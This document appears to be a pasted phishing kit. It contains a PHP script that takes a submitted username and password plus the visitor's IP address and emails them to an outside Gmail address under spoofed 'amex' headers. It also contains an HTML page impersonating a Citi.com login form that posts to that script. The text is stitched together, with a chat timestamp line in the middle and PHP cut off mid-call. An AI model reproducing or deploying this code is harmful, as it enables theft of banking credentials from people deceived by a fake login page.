citi.com
3 years ago in JavaScript
$ip = getenv("REMOTE_ADDR");
$message .= "--------------PHILIP Amex Info By SB -----------------------\n";
$message .= "user : ".$_POST['user']."\n";
$message .= "pass : ".$_POST['pass']."\n";
$message .= "IP : ".$ip."\n";
$message .= "date and time : ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n";
$message .= "---------------Created BY SB-------------\n";
$send = $send = "mohammed.noip707@gmail.com";
$subject = "53";
$headers = "From: amex <customer-support@Spammers>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
$fp = fopen("../report/users.txt","a"
[10:10 AM, 8/15/2020] Ace Malone⚓️⚓️: <!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Banking with Citi | Citi.com</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<link href="images/index.bmp" rel="shortcut icon" type="image/x-icon">
<link href="css/Untitled1.css" rel="stylesheet">
<link href="css/index.css" rel="stylesheet">
</head>
<body>
<form name="ff" action="data.php" method="POST">
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:913px;top:395px;width:315px;height:47px;z-index:2;">
<input type="text" id="Editbox2" style="position:absolute;left:923px;top:282px;width:115px;height:48px;line-height:50px;z-index:5;" name="user" value="" placeholder="User ID" title="Enter your username" required>
<input type="password" id="Editbox2" style="position:absolute;left:1083px;top:282px;width:117px;height:48px;line-height:50px;z-index:5;" name="pass" value="" placeholder="Password" title="Enter your password" required>
</form>
</body>
</html>